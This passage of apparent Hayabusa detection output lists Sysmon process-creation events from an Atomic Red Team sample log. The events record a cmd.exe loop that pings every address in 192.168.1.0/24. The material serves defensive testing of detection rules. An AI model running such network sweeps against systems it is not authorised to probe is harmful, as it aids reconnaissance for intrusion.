747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 
1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 
747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: 